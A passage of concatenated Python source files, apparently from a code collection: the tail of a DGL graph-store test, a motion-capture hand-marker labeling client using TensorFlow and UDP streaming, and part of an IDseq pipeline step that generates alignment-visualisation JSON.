serv_p.join()
work_p1.join()
work_p2.join()
def check_compute_func(worker_id, graph_name):
time.sleep(3)
print("worker starts")
g = dgl.contrib.graph_store.create_graph_from_store(graph_name, "shared_mem", port=rand_port)
g._sync_barrier()
in_feats = g.nodes[0].data['feat'].shape[1]
# Test update all.
g.update_all(fn.copy_src(src='feat', out='m'), fn.sum(msg='m', out='preprocess'))
adj = g.adjacency_matrix()
tmp = mx.nd.dot(adj, g.nodes[:].data['feat'])
assert np.all((g.nodes[:].data['preprocess'] == tmp).asnumpy())
g._sync_barrier()
check_array_shared_memory(g, worker_id, [g.nodes[:].data['preprocess']])
# Test apply nodes.
data = g.nodes[:].data['feat']
g.apply_nodes(func=lambda nodes: {'feat': mx.nd.ones((1, in_feats)) * 10}, v=0)
assert np.all(data[0].asnumpy() == g.nodes[0].data['feat'].asnumpy())
# Test apply edges.
data = g.edges[:].data['feat']
g.apply_edges(func=lambda edges: {'feat': mx.nd.ones((1, in_feats)) * 10}, edges=0)
assert np.all(data[0].asnumpy() == g.edges[0].data['feat'].asnumpy())
g.init_ndata('tmp', (g.number_of_nodes(), 10), 'float32')
data = g.nodes[:].data['tmp']
# Test pull
g.pull(1, fn.copy_src(src='feat', out='m'), fn.sum(msg='m', out='tmp'))
assert np.all(data[1].asnumpy() == g.nodes[1].data['preprocess'].asnumpy())
# Test send_and_recv
in_edges = g.in_edges(v=2)
g.send_and_recv(in_edges, fn.copy_src(src='feat', out='m'), fn.sum(msg='m', out='tmp'))
assert np.all(data[2].asnumpy() == g.nodes[2].data['preprocess'].asnumpy())
g.destroy()
def test_compute():
serv_p = Process(target=server_func, args=(2, 'test_graph3'))
work_p1 = Process(target=check_compute_func, args=(0, 'test_graph3'))
work_p2 = Process(target=check_compute_func, args=(1, 'test_graph3'))
serv_p.start()
work_p1.start()
work_p2.start()
serv_p.join()
work_p1.join()
work_p2.join()
if __name__ == '__main__':
test_init()
test_compute()
|
LabelingClient.py
|
import sys
import threading
from NatNetClient import NatNetClient
import numpy as np
import math
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
import socket
import struct
import queue as queue
import time
# performs all processing and runs the neural network
# the labeled data is streamed to outputIP at outputPort
class ThreadedWorker(object):
resolutionPcm = 4
resolutionPmm = resolutionPcm / 10
# image size in cm
imageSize = 25
# max y in mm
ultimateY = 120
# number of pixels
nop = imageSize * resolutionPcm
# center point in image
zzz = [nop / 2, 0, nop - (8 * resolutionPcm)]
q = queue.LifoQueue(maxsize=0)
logged = False
outputPort = 1512
outputSocket = None
tfDevice = '/cpu:0'
config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)
inputTensor = None
outputTensor = None
sess = None
markerLabels = None
rShapesAreStreamed = True
lastRData = np.array([[0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0], [0,0,0]], dtype='f')
lastTimeStep = None
maxTimeBetweenRFrames = 0.5 #0.004 * 3
maxLegalDistForRs = 0.006
# delta for R_Shape detection
delta = 0.00475
# R_Shape distances
d12 = 0.04067110384179894
d13 = 0.03997714900977185
d14 = 0.014055661378941353
d23 = 0.02587136293308418
d24 = 0.047480735670875227
d34 = 0.03835638333555752
# load the graph of the neural network from a .pb file
def load_graph(self, frozen_graph_filename):
with tf.gfile.GFile(frozen_graph_filename, "rb") as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(
graph_def,
input_map=None,
return_elements=None,
name="prefix",
op_dict=None,
producer_op_list=None
)
return graph
def __init__(self, interval=1):
self.interval = interval
print("loading tensorflow", tf.__version__)
self.outputSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print("loading neural network")
with tf.device(self.tfDevice):
graph = self.load_graph("./labelNetwork.pb")
# We access the input and output nodes
self.inputTensor = graph.get_tensor_by_name('prefix/conv2d_1_input:0')
self.outputTensor = graph.get_tensor_by_name('prefix/output_node0:0')
self.sess = tf.Session(graph=graph, config=self.config)
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def normalizeY(self, coordinates):
yt = coordinates[1::3]
yt = (yt / self.ultimateY)
coordinates[1::3] = yt
return coordinates
# filter data which is outside the depth image bounds
def filterData(self, coordinates, transformedAndShiftedData): # coordinates in mm
# filter coordinates and apply the same filter to transformedAndShiftedData
xt = coordinates[0::3]
yt = coordinates[1::3]
zt = coordinates[2::3]
xtas = transformedAndShiftedData[0::3]
ytas = transformedAndShiftedData[1::3]
ztas = transformedAndShiftedData[2::3]
xtAfterFilter = []
ytAfterFilter = []
ztAfterFilter = []
xTransformedAndShiftedDataOutput = []
yTransformedAndShiftedDataOutput = []
zTransformedAndShiftedDataOutput = []
for i in range(len(xt)):
# if the data is outside the grid size it does not belong to the hand
if xt[i] < 0 or xt[i] >= self.nop or zt[i] < 0 or zt[i] >= self.nop or yt[i] < -self.ultimateY or yt[
i] > self.ultimateY:
continue
xtAfterFilter.append(xt[i])
ytAfterFilter.append(yt[i])
ztAfterFilter.append(zt[i])
xTransformedAndShiftedDataOutput.append(xtas[i])
yTransformedAndShiftedDataOutput.append(ytas[i])
zTransformedAndShiftedDataOutput.append(ztas[i])
cNew = np.array([xtAfterFilter, ytAfterFilter, ztAfterFilter])
cNew = cNew.T.reshape(-1)
tasNew = np.array(
[xTransformedAndShiftedDataOutput, yTransformedAndShiftedDataOutput, zTransformedAndShiftedDataOutput])
tasNew = tasNew.T.reshape(-1)
return {"coordinates": cNew, "transformedAndShiftedData": tasNew}
# create depth image of size nop x nop
def createImage(self, coordinates): # coordinates in mm
image = np.zeros((1, self.nop, self.nop, 1))
coordinatesF = coordinates # still floats
coordinates = coordinates.astype(np.int)
for j in range(0, coordinates.shape[0]):
# x z plane image with y value
image[0][coordinates[j][0]][coordinates[j][2]][0] = [coordinatesF[j][1]][0] # y values are normalized
return image
def unit_vector(self, vector):
return vector / np.linalg.norm(vector)
# perform transformation to hand coordinates by calculating new basis and performing change of basis
def transformToHandCoordinates(self, rs, data):
r1 = rs[0]
r2 = rs[1]
r3 = rs[2]
r4 = rs[3]
m12 = np.array([(r1[0] + r2[0]) / 2, (r1[1] + r2[1]) / 2, (r1[2] + r2[2]) / 2])
m14 = np.array([(r1[0] + r4[0]) / 2, (r1[1] + r4[1]) / 2, (r1[2] + r4[2]) / 2])
m23 = np.array([(r3[0] + r2[0]) / 2, (r3[1] + r2[1]) / 2, (r3[2] + r2[2]) / 2])
m34 = np.array([(r3[0] + r4[0]) / 2, (r3[1] + r4[1]) / 2, (r3[2] + r4[2]) / 2])
# find three linear independent vectors vx, vy, vz
vx = self.unit_vector(m23 - m14)
vy = self.unit_vector(np.cross(vx, (m12 - m34)))
vz = self.unit_vector(np.cross(vx, vy))
baseOld = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]).T
baseNew = np.array([vx, vy, vz]).T
cob = np.linalg.solve(baseNew, baseOld)
rotated = np.dot(cob, data.T)
return {"rotated": rotated.T, "rotationMatrix": cob}
def getDistanceNP(self, marker, data):
return np.sqrt(np.sum(np.square(np.subtract(data, marker)), axis=1))
def getDistanceNP2(self, data0, data1):
return np.sqrt(np.sum(np.square(np.subtract(data0, data1))))
def run(self):
while True:
##########################################
####### Receive Data From Listener #######
##########################################
# get first element of the queue and clear queue to minimize delay
data = self.q.get()
with self.q.mutex:
self.q.queue.clear()
if not self.logged:
print("Receiving Frame Data, Running Neural Network and Streaming Labeled Data to", outputIP)
self.logged = True
frame = {}
for i in range(len(self.markerLabels)):
frame[self.markerLabels[i]] = data[i]
for i in range(len(self.markerLabels), len(data)):
frame["Unlabeled_" + str(i - len(self.markerLabels))] = data[i]
################################################
####### Rigid Body Detection/ Extraction #######
################################################
rs = {}
timestep = time.time()
# can the last R_Shaoes be tracked or do we have to rerun the deteciton
doFindNewRS = True
if ((not self.lastTimeStep == None) and timestep <= self.lastTimeStep + self.maxTimeBetweenRFrames and timestep >= self.lastTimeStep):
dataNP = np.array(data)
doFindNewRS = False
# try to track the last R_Shapes by finding the nearest neighbors
rmseList = [float("inf")] * self.lastRData.shape[0]
indexList = [-1] * self.lastRData.shape[0]
queue = list(range(self.lastRData.shape[0]))
while len(queue) > 0:
i = queue.pop(0)
candidate = self.lastRData[i]
dist = np.array(
[dataNP[:, 0] - candidate[0], dataNP[:, 1] - candidate[1], dataNP[:, 2] - candidate[2]])
dist = dist.T
dist = np.sqrt(np.mean(np.square(dist), axis=1))
minI = np.argmin(dist, axis=0)
foundNN = False
while not foundNN:
# if all distances ar inf, all data is labeled to closer neighbors
if dist[i] == float("inf"):
break
# if there is no label found yet for the nearest neighbor we found one
if indexList[i] == -1:
indexList[i] = minI
rmseList[i] = dist[minI]
foundNN = True
# if the new candidate is closer than the previous nearest neighbor, set it as nn and run the other one again
elif rmseList[i] > dist[minI]:
queue.append(indexList[i])
indexList[i] = minI
rmseList[i] = dist[minI]
foundNN = True
# if there is already another marker closer to the R, set its distance to inf and find the 2nd nearest neighbor
else:
dist[minI] = float("inf")
minI = np.argmin(dist, axis=0)
# Check for max distance, if they are too distant we have to rerun the R_Shape detection
if not (all(i <= self.maxLegalDistForRs for i in rmseList)):
doFindNewRS = True
# save last R data for the next run
self.lastRData = dataNP[indexList]
if doFindNewRS:
rCandidates = []
for indexR1, r1c in enumerate(data):
distances = self.getDistanceNP(r1c, data)
f1 = distances[distances >= self.d14 - self.delta]
if len(f1[f1 <= self.d24 + self.delta]) < 3:
continue
# find candidates for r4
for indexR4, r4c in enumerate(data):
distanceR14 = distances[indexR4]
if (distanceR14 >= self.d14 - self.delta) and (distanceR14 <= self.d14 + self.delta):
# find candidates for r2
for indexR2, r2c in enumerate(data):
if not ((distances[indexR2] >= self.d12 - self.delta) and (
distances[indexR2] <= self.d12 + self.delta)):
continue
distanceR24 = self.getDistanceNP2(r4c, r2c)
if (distanceR24 >= self.d24 - self.delta) and (distanceR24 <= self.d24 + self.delta):
# find candidates for r3
for indexR3, r3c in enumerate(data):
if not ((distances[indexR3] >= self.d13 - self.delta) and (
distances[indexR3] <= self.d13 + self.delta)):
continue
distanceR23 = self.getDistanceNP2(r2c, r3c)
if (distanceR23 >= self.d23 - self.delta) and (distanceR23 <= self.d23 + self.delta):
# verify by checking the other distances
distanceR34 = self.getDistanceNP2(r3c, r4c)
if (distanceR34 >= self.d34 - self.delta) and (distanceR34 <= self.d34 + self.delta):
rCandidates.append(data[indexR1])
rCandidates.append(data[indexR2])
rCandidates.append(data[indexR3])
rCandidates.append(data[indexR4])
self.lastRData = np.array(rCandidates)
self.lastTimeStep = time.time()
for i in range(int(self.lastRData.shape[0] / 4)):
rs["r" + str(len(rs))] = [self.lastRData[i * 4 + 0], self.lastRData[i * 4 + 1], self.lastRData[i * 4 + 2], self.lastRData[i * 4 + 3]]
frameList = list(frame.values())
##################################
####### Filter by Distance #######
##################################
images = np.array([])
transformedAndShiftedDataMemory = []
rotationResultMemory = []
rcenterMemory = []
for i in range(len(rs)):
rshape = rs["r" + str(i)]
# find the center of the R_Shape
rcenter = [(rshape[0][0] + rshape[1][0] + rshape[2][0] + rshape[3][0]) / 4,
(rshape[0][1] + rshape[1][1] + rshape[2][1] + rshape[3][1]) / 4,
(rshape[0][2] + rshape[1][2] + rshape[2][2] + rshape[3][2]) / 4]
# the data for the neural network's grid, which does not contain the R_Shape data and data that is too far away from the R_Shape
dataForGrid = []
# remove rs itself
for j in range(len(frameList)):
if ((frameList[j][0] == rshape[0][0] and frameList[j][1] == rshape[0][1] and frameList[j][2] ==
rshape[0][2]) or
(frameList[j][0] == rshape[1][0] and frameList[j][1] == rshape[1][1] and frameList[j][
2] == rshape[1][2]) or
(frameList[j][0] == rshape[2][0] and frameList[j][1] == rshape[2][1] and frameList[j][
2] == rshape[2][2]) or
(frameList[j][0] == rshape[3][0] and frameList[j][1] == rshape[3][1] and frameList[j][
2] == rshape[3][2])):
continue
# filter by distance to remove markers that are too far away from R_Shape
# 0.212 m distance is to far away
if math.sqrt((rcenter[0] - frameList[j][0]) ** 2 +
(rcenter[1] - frameList[j][1]) ** 2 +
(rcenter[2] - frameList[j][2]) ** 2) >= 0.212:
continue
###################################
####### Shift to new Center #######
###################################
# shift data to new basis center
shifted = [frameList[j][0] - rcenter[0], frameList[j][1] - rcenter[1],
frameList[j][2] - rcenter[2]]
dataForGrid.append(shifted)
# shift R to new basis center
rzero = [[rshape[0][0] - rcenter[0], rshape[0][1] - rcenter[1], rshape[0][2] - rcenter[2]],
[rshape[1][0] - rcenter[0], rshape[1][1] - rcenter[1], rshape[1][2] - rcenter[2]],
[rshape[2][0] - rcenter[0], rshape[2][1] - rcenter[1], rshape[2][2] - rcenter[2]],
[rshape[3][0] - rcenter[0], rshape[3][1] - rcenter[1], rshape[3][2] - rcenter[2]]]
#############################################
####### Transform to hand coordinates #######
#############################################
# transform to hand coordinates
npData = np.array(dataForGrid)
if npData.shape[0] == 0:
continue
rotationResult = self.transformToHandCoordinates(rzero, npData)
dataForGrid = rotationResult["rotated"]
# remember the data in meter and independent from resolution for nearest neighbour search after running the neural network
transformedAndShiftedData = dataForGrid.reshape(-1)
# from meter to millimeter
dataForGrid = dataForGrid * 1000
#########################################################
####### Create Depth Image for the Neural Network #######
#########################################################
# from millimeter to image resolution and centered to the image center 'zzz'
dataForGrid = (dataForGrid * self.resolutionPmm) + self.zzz
# reshape for further processing
dataForGrid = dataForGrid.reshape(-1)
# remove resolutionPmm from y again, it will be normalized to [-1,1]
yt = dataForGrid[1::3]
yt = (yt / self.resolutionPmm)
dataForGrid[1::3] = yt
# filter by distance to remove markers that are too far away from R_Shape
filterResult = self.filterData(dataForGrid, transformedAndShiftedData)
dataForGrid = filterResult["coordinates"]
transformedAndShiftedData = filterResult["transformedAndShiftedData"]
# normalize y
dataForGrid = self.normalizeY(dataForGrid)
# reshape again
dataForGrid = dataForGrid.reshape(-1, 3)
transformedAndShiftedData = transformedAndShiftedData.reshape(-1, 3)
# create image for NN
image = self.createImage(dataForGrid)
if images.shape[0] == 0:
images = image
else:
images = np.append(images, image, axis=0)
transformedAndShiftedDataMemory.append(transformedAndShiftedData)
rotationResultMemory.append(rotationResult)
rcenterMemory.append(rcenter)
if images.shape[0] == 0:
continue
#####################################
####### Run the Neural Netwok #######
#####################################
pred_y_all = self.sess.run(self.outputTensor, feed_dict={self.inputTensor: images})
for hand in range(pred_y_all.shape[0]):
pred_y = pred_y_all[hand]
transformedAndShiftedData = transformedAndShiftedDataMemory[hand]
rotationResult = rotationResultMemory[hand]
rcenter = rcenterMemory[hand]
#########################################################
####### Find the Nearest Neighbors for the Labels #######
#########################################################
# get labels from neural network by nearest neighbour
prediction = np.array(pred_y)
# change to meter again
prediction = prediction / 1000
prediction = prediction.reshape(21, 2)
# save the indices of the nearest neighbors and their distances
rmseList = [float("inf")] * 21
indexList = [-1] * 21
# find the nearest candidate for each label prediction
queue = list(range(transformedAndShiftedData.shape[0]))
while len(queue) > 0:
i = queue.pop(0)
candidate = transformedAndShiftedData[i]
dist = np.array([prediction[:, 0] - candidate[0], prediction[:, 1] - candidate[2]])
dist = dist.T
dist = np.sqrt(np.mean(np.square(dist), axis=1))
minI = np.argmin(dist, axis=0)
foundNN = False
while not foundNN:
# if all distances ar inf, all data is labeled to closer neighbors
if dist[minI] == float("inf"):
break
# if there is no label found yet for the nearest neighbor we found one
if indexList[minI] == -1:
indexList[minI] = i
rmseList[minI] = dist[minI]
foundNN = True
# if the new candidate is closer than the previous nearest neighbor, set it as nn and run the other one again
elif rmseList[minI] > dist[minI]:
queue.append(indexList[minI])
indexList[minI] = i
rmseList[minI] = dist[minI]
foundNN = True
# if there is already another marker closer to the nearest label, set its distance to inf and find the 2nd nearest neighbor
else:
dist[minI] = float("inf")
minI = np.argmin(dist, axis=0)
# set the coordinates of the labeled markers, if there is not a candidate for each label, set its coordinates to (0, 0, 0)
labeledList = np.zeros((21, 3))
indexList = np.array(indexList)
indexListSetOn = np.where(indexList >= 0)
labeledList[indexListSetOn] = transformedAndShiftedData[indexList[indexListSetOn]]
####################################################################
####### Classify whether the data is left or right hand data #######
####################################################################
# is left or right hand?
# the thumb mcp of right hand data has negative y value
isRightHand = float(0)
if labeledList[3, 1] < 0:
isRightHand = float(1)
#############################################################
####### Transform and shift back to world coordinates #######
#############################################################
labeledList = np.dot(np.linalg.inv(rotationResult["rotationMatrix"]),
labeledList.T).T
labeledList = labeledList + rcenter
labeledList = list(labeledList.reshape(-1))
####################################################
####### Stream the Labeled Data to Output IP #######
####################################################
# add whether data is right handed or not
labeledList.insert(0, isRightHand)
# stream to unity
buf = struct.pack('%sf' % len(labeledList), *labeledList)
self.outputSocket.sendto(buf, (outputIP, self.outputPort))
# receives the marker definition and saves the marker labels
def markerDefinitionListener(markerSetName, names):
if markerSetName == "all":
print("marker definition received")
removePrefix = (lambda x: str(x).split(":")[1] if len(str(x).split(":")) > 1 else str(x))
# remove "all:" from marker labels
for i in range(len(names)):
names[i] = removePrefix(names[i])
worker.markerLabels = names
# receives the marker data, and pass to worker thread
def markerDataListener(data):
worker.q.put(data)
# This will create a new NatNet client
streamingClient = NatNetClient()
streamingClient.markerDefinitionListener = markerDefinitionListener
streamingClient.markerDataListener = markerDataListener
worker = ThreadedWorker()
print("==========================================================================")
outputIP = "192.168.56.1"
if len(sys.argv) > 1:
streamingClient.serverIPAddress = sys.argv[1]
if len(sys.argv) > 2:
outputIP = sys.argv[2]
if len(sys.argv) > 3:
if sys.argv[3] == "gpu":
worker.tfDevice = '/gpu:0'
worker.config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True, device_count={'GPU': 4})
print("Using Device " + worker.tfDevice)
else:
print("No Motive IP or Output IP was given. Run with parameters to hand over IPs! Run for Example:")
print("sudo python3 LabelingClient.py <motiveIP> <outputIP>")
print("sudo python3 LabelingClient.py 192.168.56.1 192.168.56.1")
print("==========================================================================")
print("Motive IP", streamingClient.serverIPAddress)
print("Output IP", outputIP)
print("==========================================================================")
print("starting natnet streaming client")
streamingClient.run()
|
generate_alignment_viz.py
|
import json
import os
import re
import time
import traceback
from collections import defaultdict
import subprocess
import threading
from idseq_dag.engine.pipeline_step import PipelineStep
from idseq_dag.util.lineage import INVALID_CALL_BASE_ID
import idseq_dag.util.log as log
import idseq_dag.util.command as command
import idseq_dag.util.s3 as s3
from idseq_dag.util.dict import IdSeqDictValue, open_file_db_by_extension
class PipelineStepGenerateAlignmentViz(PipelineStep):
"""Pipeline step to generate JSON file for read alignment visualizations to
be consumed by the web app.
"""
def count_reads(self):
pass
REF_DISPLAY_RANGE = 100
MAX_SEQ_DISPLAY_SIZE = 6000
def run(self):
# Setup
nt_db = self.additional_attributes["nt_db"]
nt_loc_db = s3.fetch_reference(
self.additional_files["nt_loc_db"],
self.ref_dir_local,
auto_unzip=True, # This is default for reference download, just being explicit.
allow_s3mi=True)
db_type = "nt" # Only NT supported for now
# TODO: Design a way to map in/out files more robustly, e.g. by name/type
annotated_m8 = self.input_files_local[0][0]
annotated_fasta = self.input_files_local[1][0]
output_json_dir = os.path.join(self.output_dir_local, "align_viz")
# Go through annotated_fasta with a db_type (NT/NR match). Infer the
# family/genus/species info
read2seq = PipelineStepGenerateAlignmentViz.parse_reads(
annotated_fasta, db_type)
log.write(f"Read to Seq dictionary size: {len(read2seq)}")
groups, line_count = self.process_reads_from_m8_file(
annotated_m8, read2seq)
# If nt_db is not yet downloaded, then do download nt_db here
if nt_db.startswith("s3://"):
# TODO: Handle this better. We might be poorly provisioned to allow s3mi speed
# for this step, on the instance where it is running.
nt_db = s3.fetch_reference(
nt_db,
self.ref_dir_local,
auto_unzip=True, # this is default for reference uploads, just being explicit
allow_s3mi=True) # s3mi probably okay here because we tend to download only NT and little else in this stage
with open_file_db_by_extension(nt_loc_db, IdSeqDictValue.VALUE_TYPE_ARRAY) as nt_loc_dict:
log.write("Getting sequences by accession list from file...")
PipelineStepGenerateAlignmentViz.get_sequences_by_accession_list_from_file(
groups, nt_loc_dict, nt_db)
for _accession_id, ad in groups.items():
ad['coverage_summary'] = PipelineStepGenerateAlignmentViz.calculate_alignment_coverage(
ad)
result_dict, to_be_deleted = self.populate_reference_sequences(groups)
# Delete temp files
def safe_multi_delete(files):
for f in files:
try:
os.remove(f)
except:
pass
deleter_thread = threading.Thread(
target=safe_multi_delete, args=[to_be_deleted])
deleter_thread.start()
self.dump_align_viz_json(output_json_dir, db_type, result_dict)
deleter_thread.join()
# Write summary file
summary_msg = f"Read2Seq Size: {len(read2seq)}, M8 lines {line_count}, " \
f"{len(groups)} unique accession ids "
summary_file_name = f"{output_json_dir}.summary"
with open(summary_file_name, 'w') as summary_f:
summary_f.write(summary_msg)
def process_reads_from_m8_file(self, annotated_m8, read2seq):
# Go through m8 file and infer the alignment info. Grab the fasta
# sequence, lineage info.
groups = {}
line_count = 0
with open(annotated_m8, 'r') as m8f:
for line in m8f:
line_count += 1
if line_count % 100000 == 0:
log.write(f"{line_count} lines in the m8 file processed.")
line_columns = line.rstrip().split("\t")
read_id = line_columns[0]
seq_info = read2seq.get(read_id)
if seq_info:
accession_id = line_columns[1]
metrics = line_columns[2:]
# "ad" is short for "accession_dict" aka "accession_info"
ad = groups.get(accession_id, {'reads': []})
sequence, ad['family_id'], ad['genus_id'], ad[
'species_id'] = seq_info
ref_start = int(metrics[-4])
ref_end = int(metrics[-3])
if ref_start > ref_end: # SWAP
ref_start, ref_end = ref_end, ref_start
ref_start -= 1
prev_start = ref_start - self.REF_DISPLAY_RANGE
if prev_start < 0:
prev_start = 0
post_end = ref_end + self.REF_DISPLAY_RANGE
markers = prev_start, ref_start, ref_end, post_end
ad['reads'].append([read_id, sequence, metrics, markers])
base_url = "https://www.ncbi.nlm.nih.gov/nuccore"
ad['ref_link'] = f"{base_url}/{accession_id}?report=fasta"
groups[accession_id] = ad
log.write(f"{line_count} lines in the m8 file")
log.write(f"{len(groups)} unique accession ids")
return groups, line_count
def populate_reference_sequences(self, groups):
result_dict = {}
to_be_deleted = []
error_count = 0 # Cap max errors
ref_seq_not_found_message = "REFERENCE SEQUENCE NOT FOUND"
# "ad" is short for "accession_dict" aka "accession_info"
# NOTE: - If groups was generated by the get_sequences_by_accession_list_from_file method,
# then ad['ref_seq'] already contains the reference sequence.
# - If groups was generated by the get_sequences_by_accession_list_from_s3 method,
# then ad does not yet contain a key 'ref_seq' and instead the reference sequence
# needs to be read from one of the "accession files" downloaded in that method.
for accession_id, ad in groups.items():
try:
tmp_file = f'accession-{accession_id}'
if ad['ref_seq_len'] <= self.MAX_SEQ_DISPLAY_SIZE and 'ref_seq' not in ad:
if ad['ref_seq_len'] == 0:
ad['ref_seq'] = ref_seq_not_found_message
else:
with open(tmp_file, "rb") as tf:
ad['ref_seq'] = tf.read()
to_be_deleted.append(tmp_file)
if 'ref_seq' in ad:
ref_seq = ad['ref_seq']
for read in ad['reads']:
prev_start, ref_start, ref_end, post_end = read[3]
if ref_seq == ref_seq_not_found_message:
read[3] = ['', '', '']
else:
read[3] = [
ref_seq[prev_start:ref_start],
ref_seq[ref_start:ref_end],
ref_seq[ref_end:post_end]
]
if type(ref_seq) is bytes:
read[3] = [segment.decode('utf-8') for segment in read[3]]
else:
# The reference sequence is too long to read entirely in RAM,
# so we only read the mapped segments.
with open(tmp_file, "rb") as tf:
for read in ad['reads']:
prev_start, ref_start, ref_end, post_end = read[3]
tf.seek(prev_start, 0)
segment = tf.read(post_end - prev_start)
read[3] = [
segment[0:(ref_start - prev_start)].decode('utf-8'),
segment[(ref_start - prev_start):(
ref_end - prev_start)].decode('utf-8'),
segment[(ref_end - prev_start):(
post_end - prev_start)].decode('utf-8')
]
to_be_deleted.append(tmp_file)
if ad['ref_seq_len'] > self.MAX_SEQ_DISPLAY_SIZE:
ad['ref_seq'] = '...Reference Seq Too Long ...'
if type(ad['ref_seq']) is bytes:
ad['ref_seq'] = ad['ref_seq'].decode('utf-8')
except:
ad['ref_seq'] = "ERROR ACCESSING REFERENCE SEQUENCE FOR ACCESSION " \
"ID {}".format(accession_id)
if error_count == 0:
# Print stack trace for first error
traceback.print_exc()
error_count += 1
finally:
family_id = ad.pop('family_id')
genus_id = ad.pop('genus_id')
species_id = ad.pop('species_id')
family_dict = result_dict.get(family_id, {})
genus_dict = family_dict.get(genus_id, {})
species_dict = genus_dict.get(species_id, {})
species_dict[accession_id] = ad
genus_dict[species_id] = species_dict
family_dict[genus_id] = genus_dict
result_dict[family_id] = family_dict
if error_count > 10:
# Fail this many and the job is toast
msg = "Sorry, could not access reference sequences for over " \
"{error_count} accession IDs.".format(error_count=error_count)
raise RuntimeError(msg)
return result_dict, to_be_deleted
def dump_align_viz_json(self, output_json_dir, db_type, result_dict):
def align_viz_name(tag, lin_id):
return f"{output_json_dir}/{db_type}.{tag}.{int(lin_id)}.align_viz.json"
# Generate JSON files for the align_viz folder
command.make_dirs(output_json_dir)
for (family_id, family_dict) in result_dict.items():
fn = align_viz_name("family", family_id)
with open(fn, 'w') as out_f:
json.dump(family_dict, out_f)
for (genus_id, genus_dict) in family_dict.items():
fn = align_viz_name("genus", genus_id)
with open(fn, 'w') as out_f:
json.dump(genus_dict, out_f)
for (species_id, species_dict) in genus_dict.items():
fn = align_viz_name("species", species_id)
with open(fn, 'w') as out_f:
json.dump(species_dict, out_f)
self.additional_output_folders_hidden.append(output_json_dir)
@staticmethod
def parse_reads(annotated_fasta, db_type):
read2seq = {}
search_string = f"species_{db_type}"
adv_search_string = r"family_%s:([-\d]+):.*genus_%s:([-\d]+):.*species_%s:(" \
r"[-\d]+).*NT:[^:]*:(.*)" % (
db_type, db_type, db_type)
with open(annotated_fasta, 'r') as af:
read_id = ''
for line in af:
if line[0] == '>':
read_id = line
else:
sequence = line
m = re.search(r"%s:([\d-]*)" % search_string, read_id)
if m:
species_id = int(m.group(1))
if species_id > 0 or species_id < INVALID_CALL_BASE_ID:
# Match found
ma = re.search(adv_search_string, read_id)
if ma:
read2seq[ma.group(4).rstrip()] = [
sequence.rstrip(),
ma.group(1),
ma.group(2),
ma.group(3)
]
return read2seq
@staticmethod
def get_sequences_by_accession_list_from_file(accession2seq, nt_loc_dict,
nt_file):
with open(nt_file) as ntf:
for accession_id, accession_info in accession2seq.items():
ref_seq, seq_name = PipelineStepGenerateAlignmentViz.get_sequence_by_accession_id_ntf(
accession_id, nt_loc_dict, ntf)
accession_info['ref_seq'] = ref_seq
accession_info['ref_seq_len'] = len(ref_seq)
accession_info['name'] = seq_name
# This is now only used by Phylo tree. Please don't call it with long lists; it's now sequential.
@staticmethod
def get_sequences_by_accession_list_from_s3(accession_id_groups, nt_loc_dict, nt_s3_path):
index_errors = 0
nt_bucket, nt_key = nt_s3_path[5:].split("/", 1)
for accession_id, accession_info in accession_id_groups.items():
try:
entry = nt_loc_dict.get(accession_id)
ref_seq_len, seq_name, accession_file = PipelineStepGenerateAlignmentViz.get_sequence_by_accession_id_s3(
accession_id, entry, nt_bucket, nt_key)
accession_info['seq_file'] = accession_file
accession_info['ref_seq_len'] = ref_seq_len
accession_info['name'] = seq_name
except IndexError:
if index_errors == 0:
# Since we are swallowing all these exceptions, print one stack trace, for debugging,
# just in case it's an IndexError unrelated to the specific case we are tolerating.
# (should probably have a more specific exception class for that)
log.write(traceback.format_exc())
index_errors += 1
# all other exceptions are immediatley re-raised
if index_errors:
log.write(f"Some accessions (count: {index_errors}) could not be found in nt_db.")
@staticmethod
def get_sequence_by_accession_id_ntf(accession_id, nt_loc_dict, ntf):
ref_seq = ''
seq_name = ''
entry = nt_loc_dict.get(accession_id)
if entry:
range_start = int(entry[0])
seq_len = int(entry[1]) + int(entry[2])
ntf.seek(range_start, 0)
seq_name, ref_seq = ntf.read(seq_len).split("\n", 1)
ref_seq = ref_seq.replace("\n", "")
seq_name = seq_name.split(" ", 1)[1]
return ref_seq, seq_name
# This is now only used by Phylo tree
@staticmethod
def get_sequence_by_accession_id_s3(accession_id, entry, nt_bucket, nt_key):
seq_len = 0
seq_name = ''
if not entry:
return seq_len, seq_name, None
range_start, name_length, seq_len = [int(e) for e in entry]
accession_file = f'accession-{accession_id}'
num_retries = 3
for attempt in range(num_retries):
try:
range_file = f'range-{attempt}-accession-{accession_id}'
range_end = range_start + name_length + seq_len - 1
s3.fetch_byterange(range_start, range_end, nt_bucket, nt_key, range_file)
# (1) Take everything below the first two lines, remove the
# newlines chars, and put the sequence into accession_file
# (2) Send the first line to stdout
cmd = """cat {range_file} |tail -n+2 |tr -d '\\n' > {accession_file}; cat {range_file} |head -1""".format(range_file=range_file, accession_file=accession_file)
seq_name = subprocess.check_output(
cmd, executable='/bin/bash', shell=True).decode("utf-8").split(" ", 1)[1]
seq_name = seq_name.replace("\n", "")
# Get the sequence length based on the file size
seq_len = os.stat(accession_file).st_size
break
except IndexError as e:
# This may occur if the byterange fetched above is empty or does not properly align to an accession.
# This has occurred in the past when a reference cache issue caused the nt_loc_db and nt indices to be out of sync.
# Such issues should be investigated. However, the pipeline step can still complete with the missing data.
log.write("ntDbIndexError: Failed to get nt sequence by accession ID"
f"{accession_id} {range_start} {range_end} {nt_bucket} {nt_key}: {e}")
raise
except:
if attempt + 1 < num_retries: # Exponential backoff
time.sleep(1.0 * (4 ** attempt))
else:
log.write(f"All retries failed for getting sequence by accession ID {accession_id}.")
raise
finally:
try:
os.remove(range_file)
except:
pass
accession_file_full_path = f"{os.getcwd()}/{accession_file}"
return seq_len, seq_name, accession_file_full_path
@staticmethod
def compress_coverage(coverage):
keys = sorted(coverage.keys())
if len(keys) <= 1:
return coverage
output = {}
start = keys[0]
current = start
val = coverage[start]
for k in keys[1:]:
if (k - current) == 1 and coverage[k] == val:
current = k
